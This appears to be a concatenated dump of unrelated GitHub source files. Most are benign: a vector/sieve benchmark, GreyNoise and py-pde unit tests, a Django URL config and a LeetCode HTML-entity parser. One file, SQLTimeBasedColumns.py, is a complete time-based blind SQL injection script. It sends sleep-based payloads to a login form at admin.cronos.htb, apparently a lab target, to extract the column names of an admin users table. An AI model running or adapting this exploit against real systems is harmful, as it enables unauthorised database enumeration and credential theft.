def remove_at2(self:"Vector5", idx: int, idx2: int) -> object:
if idx < 0:
return
while idx < self.size - 1:
self.items[idx] = self.items[idx + 1]
idx = idx + 1
self.size = self.size - 1
# Removes an item from the middle of vector
def remove_at3(self:"Vector5", idx: int, idx2: int, idx3: int) -> object:
if idx < 0:
return
while idx < self.size - 1:
self.items[idx] = self.items[idx + 1]
idx = idx + 1
self.size = self.size - 1
# Removes an item from the middle of vector
def remove_at4(self:"Vector5", idx: int, idx2: int, idx3: int, idx4: int) -> object:
if idx < 0:
return
while idx < self.size - 1:
self.items[idx] = self.items[idx + 1]
idx = idx + 1
self.size = self.size - 1
# Removes an item from the middle of vector
def remove_at5(self:"Vector5", idx: int, idx2: int, idx3: int, idx4: int, idx5: int) -> object:
if idx < 0:
return
while idx < self.size - 1:
self.items[idx] = self.items[idx + 1]
idx = idx + 1
self.size = self.size - 1
# Retrieves an item at a given index
def get(self:"Vector5", idx: int) -> int:
return self.items[idx]
# Retrieves an item at a given index
def get2(self:"Vector5", idx: int, idx2: int) -> int:
return self.items[idx]
# Retrieves an item at a given index
def get3(self:"Vector5", idx: int, idx2: int, idx3: int) -> int:
return self.items[idx]
# Retrieves an item at a given index
def get4(self:"Vector5", idx: int, idx2: int, idx3: int, idx4: int) -> int:
return self.items[idx]
# Retrieves an item at a given index
def get5(self:"Vector5", idx: int, idx2: int, idx3: int, idx4: int, idx5: int) -> int:
return self.items[idx]
# Retrieves the current size of the vector
def length(self:"Vector5") -> int:
return self.size
# Retrieves the current size of the vector
def length2(self:"Vector5") -> int:
return self.size
# Retrieves the current size of the vector
def length3(self:"Vector5") -> int:
return self.size
# Retrieves the current size of the vector
def length4(self:"Vector5") -> int:
return self.size
# Retrieves the current size of the vector
def length5(self:"Vector5") -> int:
return self.size
# A faster (but more memory-consuming) implementation of vector
class DoublingVector(Vector):
doubling_limit:int = 1000
# Overriding to do fewer resizes
def increase_capacity(self:"DoublingVector") -> int:
if (self.capacity() <= self.doubling_limit // 2):
self.items = self.items + self.items
else:
# If doubling limit has been reached, fall back to
# standard capacity increases
self.items = self.items + [0]
return self.capacity()
# A faster (but more memory-consuming) implementation of vector
class DoublingVector2(Vector):
doubling_limit:int = 1000
doubling_limit2:int = 1000
# Overriding to do fewer resizes
def increase_capacity(self:"DoublingVector2") -> int:
if (self.capacity() <= self.doubling_limit // 2):
self.items = self.items + self.items
else:
# If doubling limit has been reached, fall back to
# standard capacity increases
self.items = self.items + [0]
return self.capacity()
# Overriding to do fewer resizes
def increase_capacity2(self:"DoublingVector2") -> int:
if (self.capacity() <= self.doubling_limit // 2):
self.items = self.items + self.items
else:
# If doubling limit has been reached, fall back to
# standard capacity increases
self.items = self.items + [0]
return self.capacity()
# A faster (but more memory-consuming) implementation of vector
class DoublingVector3(Vector):
doubling_limit:int = 1000
doubling_limit2:int = 1000
doubling_limit3:int = 1000
# Overriding to do fewer resizes
def increase_capacity(self:"DoublingVector3") -> int:
if (self.capacity() <= self.doubling_limit // 2):
self.items = self.items + self.items
else:
# If doubling limit has been reached, fall back to
# standard capacity increases
self.items = self.items + [0]
return self.capacity()
# Overriding to do fewer resizes
def increase_capacity2(self:"DoublingVector3") -> int:
if (self.capacity() <= self.doubling_limit // 2):
self.items = self.items + self.items
else:
# If doubling limit has been reached, fall back to
# standard capacity increases
self.items = self.items + [0]
return self.capacity()
# Overriding to do fewer resizes
def increase_capacity3(self:"DoublingVector3") -> int:
if (self.capacity() <= self.doubling_limit // 2):
self.items = self.items + self.items
else:
# If doubling limit has been reached, fall back to
# standard capacity increases
self.items = self.items + [0]
return self.capacity()
# A faster (but more memory-consuming) implementation of vector
class DoublingVector4(Vector):
doubling_limit:int = 1000
doubling_limit2:int = 1000
doubling_limit3:int = 1000
doubling_limit4:int = 1000
# Overriding to do fewer resizes
def increase_capacity(self:"DoublingVector4") -> int:
if (self.capacity() <= self.doubling_limit // 2):
self.items = self.items + self.items
else:
# If doubling limit has been reached, fall back to
# standard capacity increases
self.items = self.items + [0]
return self.capacity()
# Overriding to do fewer resizes
def increase_capacity2(self:"DoublingVector4") -> int:
if (self.capacity() <= self.doubling_limit // 2):
self.items = self.items + self.items
else:
# If doubling limit has been reached, fall back to
# standard capacity increases
self.items = self.items + [0]
return self.capacity()
# Overriding to do fewer resizes
def increase_capacity3(self:"DoublingVector4") -> int:
if (self.capacity() <= self.doubling_limit // 2):
self.items = self.items + self.items
else:
# If doubling limit has been reached, fall back to
# standard capacity increases
self.items = self.items + [0]
return self.capacity()
# Overriding to do fewer resizes
def increase_capacity4(self:"DoublingVector4") -> int:
if (self.capacity() <= self.doubling_limit // 2):
self.items = self.items + self.items
else:
# If doubling limit has been reached, fall back to
# standard capacity increases
self.items = self.items + [0]
return self.capacity()
# A faster (but more memory-consuming) implementation of vector
class DoublingVector5(Vector):
doubling_limit:int = 1000
doubling_limit2:int = 1000
doubling_limit3:int = 1000
doubling_limit4:int = 1000
doubling_limit5:int = 1000
# Overriding to do fewer resizes
def increase_capacity(self:"DoublingVector5") -> int:
if (self.capacity() <= self.doubling_limit // 2):
self.items = self.items + self.items
else:
# If doubling limit has been reached, fall back to
# standard capacity increases
self.items = self.items + [0]
return self.capacity()
# Overriding to do fewer resizes
def increase_capacity2(self:"DoublingVector5") -> int:
if (self.capacity() <= self.doubling_limit // 2):
self.items = self.items + self.items
else:
# If doubling limit has been reached, fall back to
# standard capacity increases
self.items = self.items + [0]
return self.capacity()
# Overriding to do fewer resizes
def increase_capacity3(self:"DoublingVector5") -> int:
if (self.capacity() <= self.doubling_limit // 2):
self.items = self.items + self.items
else:
# If doubling limit has been reached, fall back to
# standard capacity increases
self.items = self.items + [0]
return self.capacity()
# Overriding to do fewer resizes
def increase_capacity4(self:"DoublingVector5") -> int:
if (self.capacity() <= self.doubling_limit // 2):
self.items = self.items + self.items
else:
# If doubling limit has been reached, fall back to
# standard capacity increases
self.items = self.items + [0]
return self.capacity()
# Overriding to do fewer resizes
def increase_capacity5(self:"DoublingVector5") -> int:
if (self.capacity() <= self.doubling_limit // 2):
self.items = self.items + self.items
else:
# If doubling limit has been reached, fall back to
# standard capacity increases
self.items = self.items + [0]
return self.capacity()
# Makes a vector in the range [i, j)
def vrange(i:int, j:int) -> Vector:
v:Vector = None
v = DoublingVector()
while i < j:
v.append(i)
i = i + 1
return v
def vrange2(i:int, j:int, i2:int, j2:int) -> Vector:
v:Vector = None
v2:Vector = None
v = DoublingVector()
while i < j:
v.append(i)
i = i + 1
return v
def vrange3(i:int, j:int, i2:int, j2:int, i3:int, j3:int) -> Vector:
v:Vector = None
v2:Vector = None
v3:Vector = None
v = DoublingVector()
while i < j:
v.append(i)
i = i + 1
return v
def vrange4(i:int, j:int, i2:int, j2:int, i3:int, j3:int, i4:int, j4:int) -> Vector:
v:Vector = None
v2:Vector = None
v3:Vector = None
v4:Vector = None
v = DoublingVector()
while i < j:
v.append(i)
i = i + 1
return v
def vrange5(i:int, j:int, i2:int, j2:int, i3:int, j3:int, i4:int, j4:int, i5:int, j5:int) -> Vector:
v:Vector = None
v2:Vector = None
v3:Vector = None
v4:Vector = None
v5:Vector = None
v = DoublingVector()
while i < j:
v.append(i)
i = i + 1
return v
# Sieve of Eratosthenes (not really)
def sieve(v:Vector) -> object:
i:int = 0
j:int = 0
k:int = 0
while i < v.length():
k = v.get(i)
j = i + 1
while j < v.length():
if v.get(j) % k == 0:
v.remove_at(j)
else:
j = j + 1
i = i + 1
def sieve2(v:Vector, v2:Vector) -> object:
i:int = 0
i2:int = 0
j:int = 0
j2:int = 0
k:int = 0
k2:int = 0
while i < v.length():
k = v.get(i)
j = i + 1
while j < v.length():
if v.get(j) % k == 0:
v.remove_at(j)
else:
j = j + 1
i = i + 1
def sieve3(v:Vector, v2:Vector, v3:Vector) -> object:
i:int = 0
i2:int = 0
i3:int = 0
j:int = 0
j2:int = 0
j3:int = 0
k:int = 0
k2:int = 0
k3:int = 0
while i < v.length():
k = v.get(i)
j = i + 1
while j < v.length():
if v.get(j) % k == 0:
v.remove_at(j)
else:
j = j + 1
i = i + 1
def sieve4(v:Vector, v2:Vector, v3:Vector, v4:Vector) -> object:
i:int = 0
i2:int = 0
i3:int = 0
i4:int = 0
j:int = 0
j2:int = 0
j3:int = 0
j4:int = 0
k:int = 0
k2:int = 0
k3:int = 0
k4:int = 0
while i < v.length():
k = v.get(i)
j = i + 1
while j < v.length():
if v.get(j) % k == 0:
v.remove_at(j)
else:
j = j + 1
i = i + 1
def sieve5(v:Vector, v2:Vector, v3:Vector, v4:Vector, v5:Vector) -> object:
i:int = 0
i2:int = 0
i3:int = 0
i4:int = 0
i5:int = 0
j:int = 0
j2:int = 0
j3:int = 0
j4:int = 0
j5:int = 0
k:int = 0
k2:int = 0
k3:int = 0
k4:int = 0
k5:int = 0
while i < v.length():
k = v.get(i)
j = i + 1
while j < v.length():
if v.get(j) % k == 0:
v.remove_at(j)
else:
j = j + 1
i = i + 1
# Input parameter
n:int = 50
n2:int = 50
n3:int = 50
n4:int = 50
n5:int = 50
# Data
v:Vector = None
v2:Vector = None
v3:Vector = None
v4:Vector = None
v5:Vector = None
i:int = 0
i2:int = 0
i3:int = 0
i4:int = 0
i5:int = 0
# Crunch
v = vrange(2, n)
v2 = vrange(2, n)
v3 = vrange(2, n)
v4 = vrange(2, n)
v5 = vrange(2, n)
sieve(v)
# Print
while i < v.length():
print(v.get(i))
i = i + 1
|
[
"647530+Virtlink@users.noreply.github.com"
] |
647530+Virtlink@users.noreply.github.com
|
5b82ca7833330ee0646d306a6cef65cb5c33df37
|
762742b3c5cb5706e93e12dbdc3f8c46fc65f0db
|
/Packs/GreyNoise/Integrations/GreyNoise/GreyNoise_test.py
|
bc42620c600a89f5bf9c62f42f621c88f3b2320f
|
[
"MIT"
] |
permissive
|
EmersonElectricCo/content
|
018f95f7fe7de13819e093a3661587a18407e348
|
82c82bbee7d428f0b14991a88c67672e2c02f5af
|
refs/heads/master
| 2021-06-17T04:54:22.938033
| 2021-05-06T16:39:59
| 2021-05-06T16:39:59
| 161,693,191
| 2
| 0
|
MIT
| 2018-12-18T15:16:49
| 2018-12-13T20:47:26
|
Python
|
UTF-8
|
Python
| false
| false
| 8,763
|
py
|
import pytest
import json
import GreyNoise
from test_data.input_data import ( # type: ignore
parse_code_and_body_data,
get_ip_reputation_score_data,
test_module_data,
ip_reputation_command_data,
ip_quick_check_command_data,
generate_advanced_query_data,
query_command_data,
get_ip_context_data_data,
stats_command_data,
riot_command_response_data
)
class DummyResponse:
"""
Dummy Response object of requests.response for unit testing.
"""
def __init__(self, headers, text, status_code):
self.headers = headers
self.text = text
self.status_code = status_code
def json(self):
"""
Dummy json method.
"""
return json.loads(self.text)
@pytest.mark.parametrize("input_data, expected_output", parse_code_and_body_data)
def test_parse_code_and_body(input_data, expected_output):
"""
Tests various combinations of error codes and messages.
"""
response = GreyNoise.parse_code_and_body(input_data)
assert response == expected_output
@pytest.mark.parametrize("input_data, expected_output", get_ip_reputation_score_data)
def test_get_ip_reputation_score(input_data, expected_output):
"""
Tests various combinations of GreyNoise classification data.
"""
response = GreyNoise.get_ip_reputation_score(input_data)
assert response == expected_output
@pytest.mark.parametrize("api_key, api_response, status_code, expected_output", test_module_data)
def test_test_module(api_key, api_response, status_code, expected_output, mocker):
"""
Tests test_module for GreyNoise integration.
"""
client = GreyNoise.Client(api_key, "dummy_server", 10, "proxy", False, "dummy_integration")
if isinstance(api_key, str) and api_key == "true_key":
mocker.patch('greynoise.GreyNoise._request', return_value=api_response)
response = GreyNoise.test_module(client)
assert response == expected_output
else:
dummy_response = DummyResponse({}, api_response, status_code)
mocker.patch('requests.Session.get', return_value=dummy_response)
with pytest.raises(Exception) as err:
_ = GreyNoise.test_module(client)
assert str(err.value) == expected_output
@pytest.mark.parametrize("args, test_scenario, api_response, status_code, expected_output", ip_reputation_command_data)
def test_ip_reputation_command(args, test_scenario, api_response, status_code, expected_output, mocker):
"""
    Tests various combinations of valid and invalid responses for the IPReputation command.
"""
client = GreyNoise.Client("true_api_key", "dummy_server", 10, "proxy", False, "dummy_integration")
dummy_response = DummyResponse(
{
"Content-Type": "application/json"
},
json.dumps(api_response),
status_code
)
if test_scenario == "positive":
mocker.patch('requests.Session.get', return_value=dummy_response)
response = GreyNoise.ip_reputation_command(client, args)
assert response[0].outputs == expected_output
else:
mocker.patch('requests.Session.get', return_value=dummy_response)
with pytest.raises(Exception) as err:
_ = GreyNoise.ip_reputation_command(client, args)
assert str(err.value) == expected_output
@pytest.mark.parametrize("args, test_scenario, api_response, status_code, expected_output", ip_quick_check_command_data)
def test_ip_quick_check_command(args, test_scenario, api_response, status_code, expected_output, mocker):
"""
Tests various combinations of valid and invalid responses for ip-quick-check command.
"""
client = GreyNoise.Client("true_api_key", "dummy_server", 10, "proxy", False, "dummy_integration")
dummy_response = DummyResponse(
{
"Content-Type": "application/json"
},
json.dumps(api_response),
status_code
)
if test_scenario == "positive":
mocker.patch('requests.Session.get', return_value=dummy_response)
response = GreyNoise.ip_quick_check_command(client, args)
assert response.outputs == expected_output
elif test_scenario == "negative" and status_code == 200:
mocker.patch('requests.Session.get', return_value=dummy_response)
response = GreyNoise.ip_quick_check_command(client, args)
with open('test_data/quick_check.md') as f:
expected_hr = f.read()
assert response.readable_output == expected_hr
elif test_scenario == "negative":
mocker.patch('requests.Session.get', return_value=dummy_response)
with pytest.raises(Exception) as err:
_ = GreyNoise.ip_quick_check_command(client, args)
assert str(err.value) == expected_output
elif test_scenario == "custom":
mocker.patch('greynoise.GreyNoise.quick', return_value=api_response)
with pytest.raises(Exception) as err:
_ = GreyNoise.ip_quick_check_command(client, args)
assert str(err.value) == expected_output
@pytest.mark.parametrize("args, expected_output", generate_advanced_query_data)
def test_generate_advanced_query(args, expected_output):
"""
Tests various combinations of command arguments to generate GreyNoise advanced_query for query/stats command.
"""
response = GreyNoise.generate_advanced_query(args)
assert response == expected_output
@pytest.mark.parametrize("args, test_scenario, api_response, status_code, expected_output", query_command_data)
def test_query_command(args, test_scenario, api_response, status_code, expected_output, mocker):
"""
Tests various combinations of valid and invalid responses for query command.
"""
client = GreyNoise.Client("true_api_key", "dummy_server", 10, "proxy", False, "dummy_integration")
dummy_response = DummyResponse(
{
"Content-Type": "application/json"
},
json.dumps(api_response),
status_code
)
mocker.patch('requests.Session.get', return_value=dummy_response)
if test_scenario == "positive":
response = GreyNoise.query_command(client, args)
assert response.outputs[GreyNoise.QUERY_OUTPUT_PREFIX['IP']] == expected_output['data']
else:
with pytest.raises(Exception) as err:
_ = GreyNoise.query_command(client, args)
assert str(err.value) == expected_output
@pytest.mark.parametrize("args, test_scenario, api_response, status_code, expected_output", stats_command_data)
def test_stats_command(args, test_scenario, api_response, status_code, expected_output, mocker):
"""
Tests various combinations of valid and invalid responses for stats command.
"""
client = GreyNoise.Client("true_api_key", "dummy_server", 10, "proxy", False, "dummy_integration")
dummy_response = DummyResponse(
{
"Content-Type": "application/json"
},
json.dumps(api_response),
status_code
)
mocker.patch('requests.Session.get', return_value=dummy_response)
if test_scenario == "positive":
response = GreyNoise.stats_command(client, args)
assert response.outputs == expected_output
else:
with pytest.raises(Exception) as err:
_ = GreyNoise.stats_command(client, args)
assert str(err.value) == expected_output
@pytest.mark.parametrize("input_data, expected_output", get_ip_context_data_data)
def test_get_ip_context_data(input_data, expected_output):
"""
Tests various combinations for converting ip-context and query command responses from sdk to Human Readable format.
"""
response = GreyNoise.get_ip_context_data(input_data)
assert response == expected_output
@pytest.mark.parametrize("test_scenario, status_code, input_data, expected", riot_command_response_data)
def test_riot_command(mocker, test_scenario, status_code, input_data, expected):
"""
Test various inputs for riot command
"""
client = GreyNoise.Client(api_key="true_api_key", api_server="dummy_server", timeout=10,
proxy="proxy", use_cache=False, integration_name="dummy_integration")
dummy_response = DummyResponse(
{
"Content-Type": "application/json"
},
json.dumps(expected["raw_data"]),
status_code
)
mocker.patch('requests.Session.get', return_value=dummy_response)
if test_scenario == "positive":
response = GreyNoise.riot_command(client, input_data)
assert response.outputs == expected["raw_data"]
else:
with pytest.raises(Exception) as err:
_ = GreyNoise.riot_command(client, input_data)
assert str(err.value) == expected["error_message"].format(input_data["ip"])
|
[
"noreply@github.com"
] |
noreply@github.com
|
91c2e382f455de622a8bfb58b1df4f5bbe6b01ff
|
e13a79dec2668c1870b3fea05f071fe872d400f0
|
/pde/storage/tests/test_generic_storages.py
|
474649dd328980f34d7df91ecac637408b9e3bd6
|
[
"MIT"
] |
permissive
|
yiweizhang1025/py-pde
|
b27cc0b058b50d6af921e1ea84bf59a5bb0ff370
|
3862a35505b9ce4d62557bc65dfedd40638a90f3
|
refs/heads/master
| 2023-03-14T17:21:07.004742
| 2021-03-15T15:33:47
| 2021-03-15T15:33:47
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,739
|
py
|
"""
.. codeauthor:: David Zwicker <david.zwicker@ds.mpg.de>
"""
import functools
import numpy as np
import pytest
from pde import DiffusionPDE, FileStorage, MemoryStorage, UnitGrid
from pde.fields import FieldCollection, ScalarField, Tensor2Field, VectorField
from pde.tools.misc import module_available
def test_storage_write(tmp_path):
""" test simple memory storage """
dim = 5
grid = UnitGrid([dim])
field = ScalarField(grid)
storage_classes = {"MemoryStorage": MemoryStorage}
if module_available("h5py"):
file_path = tmp_path / "test_storage_write.hdf5"
storage_classes["FileStorage"] = functools.partial(FileStorage, file_path)
for name, storage_cls in storage_classes.items():
storage = storage_cls(info={"a": 1})
storage.start_writing(field, info={"b": 2})
storage.append(field.copy(data=np.arange(dim)), 0)
storage.append(field.copy(data=np.arange(dim)), 1)
storage.end_writing()
assert not storage.has_collection
np.testing.assert_allclose(storage.times, np.arange(2))
for f in storage:
np.testing.assert_array_equal(f.data, np.arange(dim))
for i in range(2):
np.testing.assert_array_equal(storage[i].data, np.arange(dim))
assert {"a": 1, "b": 2}.items() <= storage.info.items()
storage = storage_cls()
storage.clear()
for i in range(3):
storage.start_writing(field)
storage.append(field.copy(data=np.arange(dim) + i), i)
storage.end_writing()
np.testing.assert_allclose(
storage.times, np.arange(3), err_msg="storage class: " + name
)
def test_storage_truncation(tmp_path):
""" test whether simple trackers can be used """
file = tmp_path / "test_storage_truncation.hdf5"
for truncate in [True, False]:
storages = [MemoryStorage()]
if module_available("h5py"):
storages.append(FileStorage(file))
tracker_list = [s.tracker(interval=0.01) for s in storages]
grid = UnitGrid([8, 8])
state = ScalarField.random_uniform(grid, 0.2, 0.3)
pde = DiffusionPDE()
pde.solve(state, t_range=0.1, dt=0.001, tracker=tracker_list)
if truncate:
for storage in storages:
storage.clear()
pde.solve(state, t_range=[0.1, 0.2], dt=0.001, tracker=tracker_list)
times = np.arange(0.1, 0.201, 0.01)
if not truncate:
times = np.r_[np.arange(0, 0.101, 0.01), times]
for storage in storages:
msg = f"truncate={truncate}, storage={storage}"
np.testing.assert_allclose(storage.times, times, err_msg=msg)
assert not storage.has_collection
def test_storing_extract_range(tmp_path):
""" test methods specific to FieldCollections in memory storage """
sf = ScalarField(UnitGrid([1]))
storage_classes = {"MemoryStorage": MemoryStorage}
if module_available("h5py"):
file_path = tmp_path / "test_storage_write.hdf5"
storage_classes["FileStorage"] = functools.partial(FileStorage, file_path)
for storage_cls in storage_classes.values():
# store some data
s1 = storage_cls()
s1.start_writing(sf)
s1.append(sf.copy(data=np.array([0])), 0)
s1.append(sf.copy(data=np.array([2])), 1)
s1.end_writing()
np.testing.assert_equal(s1[0].data, 0)
np.testing.assert_equal(s1[1].data, 2)
np.testing.assert_equal(s1[-1].data, 2)
np.testing.assert_equal(s1[-2].data, 0)
with pytest.raises(IndexError):
s1[2]
with pytest.raises(IndexError):
s1[-3]
# test extraction
s2 = s1.extract_time_range()
assert s2.times == list(s1.times)
np.testing.assert_allclose(s2.data, s1.data)
s3 = s1.extract_time_range(0.5)
assert s3.times == s1.times[:1]
np.testing.assert_allclose(s3.data, s1.data[:1])
s4 = s1.extract_time_range((0.5, 1.5))
assert s4.times == s1.times[1:]
np.testing.assert_allclose(s4.data, s1.data[1:])
def test_storing_collection(tmp_path):
""" test methods specific to FieldCollections in memory storage """
grid = UnitGrid([2, 2])
f1 = ScalarField.random_uniform(grid, 0.1, 0.4, label="a")
f2 = VectorField.random_uniform(grid, 0.1, 0.4, label="b")
f3 = Tensor2Field.random_uniform(grid, 0.1, 0.4, label="c")
fc = FieldCollection([f1, f2, f3])
storage_classes = {"MemoryStorage": MemoryStorage}
if module_available("h5py"):
file_path = tmp_path / "test_storage_write.hdf5"
storage_classes["FileStorage"] = functools.partial(FileStorage, file_path)
for storage_cls in storage_classes.values():
# store some data
storage = storage_cls()
storage.start_writing(fc)
storage.append(fc, 0)
storage.append(fc, 1)
storage.end_writing()
assert storage.has_collection
assert storage.extract_field(0)[0] == f1
assert storage.extract_field(1)[0] == f2
assert storage.extract_field(2)[0] == f3
assert storage.extract_field(0)[0].label == "a"
assert storage.extract_field(0, label="new label")[0].label == "new label"
assert storage.extract_field(0)[0].label == "a" # do not alter label
assert storage.extract_field("a")[0] == f1
assert storage.extract_field("b")[0] == f2
assert storage.extract_field("c")[0] == f3
with pytest.raises(ValueError):
storage.extract_field("nonsense")
def test_storage_apply(tmp_path):
""" test the apply function of StorageBase """
grid = UnitGrid([2])
field = ScalarField(grid)
storage_classes = {"None": None, "MemoryStorage": MemoryStorage}
if module_available("h5py"):
file_path = tmp_path / "test_storage_apply.hdf5"
storage_classes["FileStorage"] = functools.partial(FileStorage, file_path)
s1 = MemoryStorage()
s1.start_writing(field, info={"b": 2})
s1.append(field.copy(data=np.array([0, 1])), 0)
s1.append(field.copy(data=np.array([1, 2])), 1)
s1.end_writing()
for name, storage_cls in storage_classes.items():
out = None if storage_cls is None else storage_cls()
s2 = s1.apply(lambda x: x + 1, out=out)
assert storage_cls is None or s2 is out
assert len(s2) == 2
np.testing.assert_allclose(s2.times, s1.times)
assert s2[0] == ScalarField(grid, [1, 2]), name
assert s2[1] == ScalarField(grid, [2, 3]), name
# test empty storage
s1 = MemoryStorage()
s2 = s1.apply(lambda x: x + 1)
assert len(s2) == 0
def test_storage_copy(tmp_path):
""" test the copy function of StorageBase """
grid = UnitGrid([2])
field = ScalarField(grid)
storage_classes = {"None": None, "MemoryStorage": MemoryStorage}
if module_available("h5py"):
file_path = tmp_path / "test_storage_apply.hdf5"
storage_classes["FileStorage"] = functools.partial(FileStorage, file_path)
s1 = MemoryStorage()
s1.start_writing(field, info={"b": 2})
s1.append(field.copy(data=np.array([0, 1])), 0)
s1.append(field.copy(data=np.array([1, 2])), 1)
s1.end_writing()
for name, storage_cls in storage_classes.items():
out = None if storage_cls is None else storage_cls()
s2 = s1.copy(out=out)
assert storage_cls is None or s2 is out
assert len(s2) == 2
np.testing.assert_allclose(s2.times, s1.times)
assert s2[0] == s1[0], name
assert s2[1] == s1[1], name
# test empty storage
s1 = MemoryStorage()
s2 = s1.copy()
assert len(s2) == 0
|
[
"david.zwicker@ds.mpg.de"
] |
david.zwicker@ds.mpg.de
|
45bb0f11373a3220f0f4387907cff7b0eee4e3f3
|
dc72589c38ba179524c2ee2e408c4f37b77cabf3
|
/backend/lizz_mob_jul15_dev_7685/urls.py
|
8827abab37592bfacf837a0176cebcca38cae754
|
[] |
no_license
|
crowdbotics-apps/lizz-mob-jul15-dev-7685
|
cbcab97908bd568acc68b606d4c5becdb160364c
|
a41e88b463169443bcfdf12cf356a958c44f3400
|
refs/heads/master
| 2022-11-17T22:30:15.286209
| 2020-07-16T17:54:10
| 2020-07-16T17:54:10
| 280,012,855
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,958
|
py
|
"""lizz_mob_jul15_dev_7685 URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/2.2/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path, include
from allauth.account.views import confirm_email
from rest_framework import permissions
from drf_yasg.views import get_schema_view
from drf_yasg import openapi
urlpatterns = [
path("", include("home.urls")),
path("accounts/", include("allauth.urls")),
path("api/v1/", include("home.api.v1.urls")),
path("admin/", admin.site.urls),
path("users/", include("users.urls", namespace="users")),
path("rest-auth/", include("rest_auth.urls")),
# Override email confirm to use allauth's HTML view instead of rest_auth's API view
path("rest-auth/registration/account-confirm-email/<str:key>/", confirm_email),
path("rest-auth/registration/", include("rest_auth.registration.urls")),
]
admin.site.site_header = "lizz mob jul15"
admin.site.site_title = "lizz mob jul15 Admin Portal"
admin.site.index_title = "lizz mob jul15 Admin"
# swagger
api_info = openapi.Info(
title="lizz mob jul15 API",
default_version="v1",
description="API documentation for lizz mob jul15 App",
)
schema_view = get_schema_view(
api_info,
public=True,
permission_classes=(permissions.IsAuthenticated,),
)
urlpatterns += [
path("api-docs/", schema_view.with_ui("swagger", cache_timeout=0), name="api_docs")
]
|
[
"team@crowdbotics.com"
] |
team@crowdbotics.com
|
04da31593f90e147dd4899029a36daa0fe6f87e5
|
867d946a375a3ad9808af45c15e8b2ea3274da0f
|
/Scripts/Linux/SQLTimeBasedColumns.py
|
4bf2980aab49ca6f4911ed4cfa193946ca4187bf
|
[] |
no_license
|
AmatheraeWorld/AmatheraeWorld
|
5985a6731221d375750d30ca22c59fe3aed52a1f
|
1b32d2d2fed410c9c486c1cbc21dc8fa0ac8d1a7
|
refs/heads/master
| 2023-06-16T13:41:32.443881
| 2021-07-11T20:26:51
| 2021-07-11T20:26:51
| 265,905,582
| 1
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,147
|
py
|
#!/usr/bin/python3
import requests, time, sys, signal
from pwn import *
def def_handler(sig, frame):
    log.failure("Exiting")
sys.exit(1)
signal.signal(signal.SIGINT, def_handler)
url = 'http://admin.cronos.htb/index.php'
burp = {'http': 'http://127.0.0.1:8080'}
s = r'0123456789abcdefghijklmnopqrstuvwxyz'
result = ''
def check(payload):
data_post = {
'username': '%s' % payload,
'password': 'test'
}
time_start = time.time()
content = requests.post(url, data=data_post)
time_end = time.time()
if time_end - time_start > 5:
return 1
p2 = log.progress("Payload")
for j in range(0,5):
p1 = log.progress("Columnas [%d]" % j)
for i in range (1, 10):
for c in s:
payload = "' or if(substr((select column_name from information_schema.columns where table_schema='admin' and table_name='users' limit %d,1),%d,1)='%c',sleep(5),1)-- -" % (j, i, c)
p2.status("%s" % payload)
if check(payload):
result += c
p1.status("%s" % result)
break
p1.success("%s" % result)
result = ''
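# How the extraction works (summary of the code above): for each position of
# each column name, the payload asks MySQL to sleep(5) when substr(...) equals
# the guessed character, so a POST that takes longer than 5 seconds confirms
# the guess; check() measures that delay and the nested loops rebuild each
# column name one character at a time.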
|
[
"noreply@github.com"
] |
noreply@github.com
|
241b062d29b2a2e895a396fb385dd2ffb44bab96
|
3ff9821b1984417a83a75c7d186da9228e13ead9
|
/No_1410_HTML Entity Parser/by_re_replacement.py
|
c017682935944a4f3a73df684c4c097a91d80e6d
|
[
"MIT"
] |
permissive
|
brianchiang-tw/leetcode
|
fd4df1917daef403c48cb5a3f5834579526ad0c2
|
6978acfb8cb767002cb953d02be68999845425f3
|
refs/heads/master
| 2023-06-11T00:44:01.423772
| 2023-06-01T03:52:00
| 2023-06-01T03:52:00
| 222,939,709
| 41
| 12
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,076
|
py
|
'''
Description:
HTML entity parser is a parser that takes HTML code as input and replaces all entities of the special characters with the characters themselves.
The special characters and their entities for HTML are:
Quotation Mark: the entity is &quot; and symbol character is ".
Single Quote Mark: the entity is &apos; and symbol character is '.
Ampersand: the entity is &amp; and symbol character is &.
Greater Than Sign: the entity is &gt; and symbol character is >.
Less Than Sign: the entity is &lt; and symbol character is <.
Slash: the entity is &frasl; and symbol character is /.
Given the input text string to the HTML parser, you have to implement the entity parser.
Return the text after replacing the entities by the special characters.
Example 1:
Input: text = "& is an HTML entity but &ambassador; is not."
Output: "& is an HTML entity but &ambassador; is not."
Explanation: The parser will replace the & entity by &
Example 2:
Input: text = "and I quote: "...""
Output: "and I quote: \"...\""
Example 3:
Input: text = "Stay home! Practice on Leetcode :)"
Output: "Stay home! Practice on Leetcode :)"
Example 4:
Input: text = "x > y && x < y is always false"
Output: "x > y && x < y is always false"
Example 5:
Input: text = "leetcode.com⁄problemset⁄all"
Output: "leetcode.com/problemset/all"
Constraints:
1 <= text.length <= 10^5
The string may contain any possible characters out of all the 256 ASCII characters.
'''
import re
class Solution:
def entityParser(self, text: str) -> str:
        html_symbol = [ '&quot;', '&apos;', '&gt;', '&lt;', '&frasl;', '&amp;']
formal_symbol = [ '"', "'", '>', '<', '/', '&']
for html_sym, formal_sym in zip(html_symbol, formal_symbol):
text = re.sub( html_sym , formal_sym, text )
return text
# n : the character length of input, text.
## Time Complexity: O( n )
#
# The overhead in time is the cost of string replacement, which is of O( n ).
## Space Complexity: O( n )
#
# The overhead in space is the storage for output string, which is of O( n ).
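# Side note (not part of the original solution): Python's stdlib offers
# html.unescape for the standard entities, e.g.
#   import html
#   html.unescape('x &gt; y')   # -> 'x > y'
# but it decodes &frasl; to the Unicode fraction slash U+2044 rather than the
# '/' this problem requires, so the explicit table above is still needed.
# Note also that '&amp;' is deliberately last in html_symbol, so it is
# replaced only after the other entities have been handled.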
from collections import namedtuple
TestEntry = namedtuple('TestEntry', 'text')
def test_bench():
test_data = [
TestEntry( text = "& is an HTML entity but &ambassador; is not." ),
